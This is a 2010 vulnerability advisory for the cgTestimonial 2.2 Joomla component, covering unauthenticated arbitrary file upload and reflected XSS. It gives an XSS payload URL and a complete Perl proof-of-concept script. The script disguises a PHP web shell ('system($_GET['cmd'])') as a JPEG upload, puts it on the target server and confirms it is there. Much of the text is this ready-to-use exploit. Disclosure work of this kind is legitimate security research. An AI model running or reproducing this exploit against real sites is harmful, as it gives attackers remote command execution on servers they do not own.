cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities

Name cgTestimonial
Vendor http://www.cmsgalaxy.com
Versions Affected 2.2

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-08-06

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX

I. ABOUT THE APPLICATION
________________________

cg_Testimonial component is a tool for adding
testimonial by the user from frontend and managing and
publishing testimonials from backend.
This Joomla extension allows website user to submit a
testimonials form with several fields on one of your
site's page and enable adding testimonials by either
users or admin.

II. DESCRIPTION
_______________

Some parameters are not properly sanitised.The following
vulnerabilities can be exploited from guest users.

III. ANALYSIS
_____________

Summary:

A) Multiple Arbitrary File Upload
B) XSS

A) Multiple Arbitrary File Upload
_________________________________

The usr_img parameter in cgtestimonial.php (frontend)
and in testimonial.php (admin, without checks) is not
properly sanitised. A check is executed on the content-
type HTTP field.

B) XSS
______

The url parameter in video.php is not properly sanitised
before being printed on screen.

IV. SAMPLE CODE
_______________

A) Multiple Arbitrary File Upload

http://poc.salvatorefresta.net/PoC-cgTestimonial2.2.pl.txt

B) XSS

http://site/path/components/com_cgtestimonial/video.php?url="><script>al
ert('xss');</script>

V. FIX
______

No fix.

#!/usr/bin/perl
#
# PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component
#
# Author: Salvatore Fresta aka Drosophila
# Email: salvatorefresta (at) gmail (dot) com [email concealed]
#
# Date: 06 August 2010
#
# http://target/path/components/com_cgtestimonial/user_images/filename?cmd
=command
#

use IO::Socket;

$usage = "\ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta\n".
"http://www.salvatorefresta.net\n\n".
"Usage: perl PoC-cgTestimonial.pl <hostname> <path>\n\n";

$#ARGV == 1 || die $usage;

my $host = $ARGV[0];
my $path = $ARGV[1];

my $stop = 0;
my $rand = "master".int(rand 150);
my $shell = "<?php echo \"<pre>\"; system(\$_GET['cmd']); echo \"</pre>\"; ?>";
my $filename = "evil.php";

my $code = "--AaB03x\r\n".
"Content-Disposition: form-data; name=\"usr_img\"; filename=\"$filename\"\r\n".
"Content-Type: image/jpeg\r\n".
"\r\n".
"$shell\r\n".
"--AaB03x--";

my $pkg = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1\r\n".
"Host: $host\r\n".
"Content-Type: multipart/form-data; boundary=AaB03x\r\n".
"Content-Length: " .length($code). "\r\n".
"\r\n".
$code;

my $socket = new IO::Socket::INET( Proto=> "tcp",
PeerAddr=> $host,
PeerPort=> "80"
) or die "\n[-] Unable to connect to $host\n\n";

print "\n[+] Connected\n";
print $socket $pkg;

$pkg = "GET ".$path."components/com_cgtestimonial/user_images/".$filename." HTTP/1.1\r\n".
"Host: $host\r\n\r\n";

print $socket $pkg;

while ((my $rec = <$socket>) && $stop != 1) {
if($rec !=~ /302 Found/) {
$stop = 1;
}
}

if($stop != 1) {
print "[-] Shell not uploaded\n";
close($socket);
exit;
}

print "[+] Shell uploaded on ".$host.$path."components/com_cgtestimonial/user_images/".$filename."\n"
.
"[+] Disconnected\n\n";

close($socket);

[ reply ]